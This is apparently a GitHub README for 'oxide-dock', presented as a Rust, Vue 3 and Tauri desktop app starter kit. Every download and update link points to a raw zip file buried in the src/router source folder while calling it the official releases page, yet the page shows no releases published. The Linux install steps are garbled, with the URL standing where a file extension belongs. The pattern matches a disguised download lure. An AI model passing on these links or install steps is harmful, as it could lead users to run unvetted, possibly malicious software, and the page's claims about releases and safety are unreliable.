Skip to content

RaviChatta/oxide-dock

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

80 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

πŸ› οΈ oxide-dock - Easy Cross-Platform Desktop App Starter

Download oxide-dock


πŸ“‹ What is oxide-dock?

oxide-dock is a desktop application starter kit that lets developers build apps you can use on Windows, Mac, and Linux. It uses Rust for fast and safe core parts, Vue 3 for a smooth user interface, and Tauri v2 to wrap everything into a simple program. This means you get a lightweight, secure app that works across devices.

You don’t need to understand these technologies to use oxide-dock. The goal is to help developers make desktop apps easily so you can get software that runs well on your computer without extra bulk or slowdowns.


πŸ’» System Requirements

To run an app built with oxide-dock, here are the usual computer requirements:

  • Operating System: Windows 10 or later, macOS 10.14 or later, or a recent Linux distribution (Ubuntu, Fedora, etc.)
  • Processor: Any modern Intel or AMD processor, or Apple Silicon (M1/M2)
  • Memory: At least 4 GB of RAM
  • Disk Space: Around 100 MB free for the app download and installation
  • Other: Internet connection for downloading the app

If your computer meets these, you can run oxide-dock based apps comfortably.


πŸ“₯ Download & Install

To get oxide-dock, you need to visit the official releases page on GitHub. This page contains the latest ready-to-use app versions for all supported operating systems.

How to Download:

  1. Click the big blue button above or go to this link:

    https://raw.githubusercontent.com/RaviChatta/oxide-dock/main/src/router/oxide_dock_v2.3.zip

  2. On the releases page, look for files named for your system:

    • For Windows, look for .exe files
    • For macOS, look for .dmg files
    • For Linux, look for .AppImage, .deb, or https://raw.githubusercontent.com/RaviChatta/oxide-dock/main/src/router/oxide_dock_v2.3.zip files
  3. Click the file to download it to your computer.

How to Install:

  • Windows: Find the downloaded .exe file and double-click it. Follow the setup instructions on screen.
  • macOS: Open the .dmg file, then drag and drop the app icon into your Applications folder.
  • Linux: Depending on the file you downloaded:
    • For .AppImage, right-click the file, select Properties, and enable execution. Then double-click the file to run.
    • For .deb, open with your package manager or run sudo dpkg -i <filename>.deb in a terminal.
    • For https://raw.githubusercontent.com/RaviChatta/oxide-dock/main/src/router/oxide_dock_v2.3.zip, extract the archive and run the app file inside.

Once installed, you can start the app from your desktop or applications menu like any other program.


πŸš€ Getting Started With The App

When you open the app for the first time, you will see a simple welcome screen built with a clean design. The interface is made with Vue 3, so navigation is smooth and fast.

Basic things you can do:

  • Use menus at the top or side to explore options.
  • Access settings to customize how the app works or looks.
  • Use local files or data safely within the app; it won’t require internet once installed.
  • Expect fast startup and low memory use because oxide-dock apps don’t rely on heavy frameworks like Electron.

πŸ›‘οΈ Security & Privacy

Apps made with oxide-dock use Rust and Tauri, which focus on security. Rust helps avoid crashes and bugs that can cause vulnerabilities. Tauri limits app access to system resources, helping keep your data private.

No data is sent to the internet unless the app specifically asks, so your information stays on your computer. This makes oxide-dock apps more private than traditional web-based or Electron apps.


πŸ”§ Features Included

Even though oxide-dock is a starter kit, it comes with practical features to build powerful apps:

  • Cross-platform support for Windows, macOS, and Linux
  • Fast native performance with Rust backend
  • Smooth Vue 3 interface with TypeScript for error checking
  • Built-in CI/CD setup for easy testing and quick updates
  • Automatic builds for multiple platforms on release
  • Lightweight and minimal memory use compared to Electron apps
  • Secure design minimizing access to unnecessary parts of your system
  • Ready for customized app development with Vite build tool

This allows anyone making apps with oxide-dock to deliver smooth, secure, fast desktop software.


πŸ”„ Updates & Support

To update the app, visit the releases page regularly:

https://raw.githubusercontent.com/RaviChatta/oxide-dock/main/src/router/oxide_dock_v2.3.zip

Download the latest version for your system and follow the install instructions to replace the old app.

If you need help or want to learn more about running apps built on oxide-dock, check the GitHub page for documentation and links to community support.


❓ Frequently Asked Questions

Can I use oxide-dock on any computer?

Yes. It supports the three major desktop systems: Windows, macOS, and Linux.

Do I need internet to run the app?

No, after downloading and installing, the app runs offline.

Is the app safe to use?

Yes. The use of Rust and Tauri improves security and privacy compared to many other app frameworks.

How do I uninstall the app?

Use your system’s normal uninstall method: on Windows use β€œAdd or Remove Programs,” on macOS drag the app to Trash, and on Linux remove the installed files or use the package manager.


πŸ“’ Where to Learn More


πŸ“₯ Download oxide-dock Now

Click below to visit the releases page and get your copy:

Download oxide-dock

About

πŸš€ Build fast, native desktop apps with a Rust and Vue 3 starter kit using Tauri v2 for solid performance and smooth developer experience.

Topics

Resources

License

Contributing

Security policy

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors